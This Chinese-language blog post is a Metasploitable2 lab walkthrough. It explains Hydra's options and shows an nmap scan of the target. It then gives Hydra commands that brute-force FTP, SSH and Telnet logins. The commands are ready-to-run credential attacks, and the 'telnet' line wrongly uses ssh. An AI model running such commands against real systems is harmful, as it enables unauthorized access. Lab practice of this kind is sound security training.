記一次metasploitable2內網滲透之21,22,23埠爆破
阿新 • • 發佈:2020-12-07
Hydra是一款非常強大的暴力破解工具,它是由著名的黑客組織THC開發的一款開源暴力破解工具。Hydra是一個驗證性質的工具,主要目的是:展示安全研究人員從遠端獲取一個系統認證許可權。
目前該工具支援以下協議的爆破:
AFP,Cisco AAA,Cisco身份驗證,Cisco啟用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere, PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP列舉,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP。
對於 HTTP,POP3,IMAP和SMTP,支援幾種登入機制,如普通和MD5摘要等。
Hydra暴力破解工具的用法_byc6352的專欄-CSDN部落格
hydra常見引數 -R:繼續從上一次進度接著破解 -S:大寫,採用SSL連結 -s <PORT>:小寫,可通過這個引數指定非預設埠 -l <LOGIN>:指定破解的使用者,對特定使用者破解 -L <FILE>:指定使用者名稱字典 -p <PASS>:小寫,指定密碼破解,少用,一般是採用密碼字典 -P <FILE>:大寫,指定密碼字典 -e <ns>:可選選項,n:空密碼試探,s:使用指定使用者和密碼試探-C <FILE>:使用冒號分割格式,例如“登入名:密碼”來代替 -L/-P 引數 -M <FILE>:指定目標列表檔案一行一條 -o <FILE>:指定結果輸出檔案 -f :在使用-M引數以後,找到第一對登入名或者密碼的時候中止破解 -t <TASKS>:同時執行的執行緒數,預設為16 -w <TIME>:設定最大超時的時間,單位秒,預設是30s -v / -V:顯示詳細過程 server:目標ip service:指定服務名,支援的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等 OPT:可選項
nmap掃描metasploitable2靶機,發現有21,22,23號埠,在這篇文章就以這三埠進行詳細例項講解
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:11 CST Nmap scan report for 192.168.43.46 Host is up (0.00032s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open tcpwrapped 1099/tcp open java-rmi GNU Classpath grmiregistry 1524/tcp open bindshell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds
通過下列程式碼爆破出ftp登入名和密碼為msfadmin
hydra -L username.txt -P password.txt 192.168.1.1 ftp
通過下列程式碼爆破出ssh登入名和密碼為msfadmin
hydra -l msfadmin -p msfadmin 192.168.1.1 ssh
通過下列程式碼爆破出telnet登入名和密碼為msfadmin
hydra -l msfadmin -p msfadmin 192.168.1.1 ssh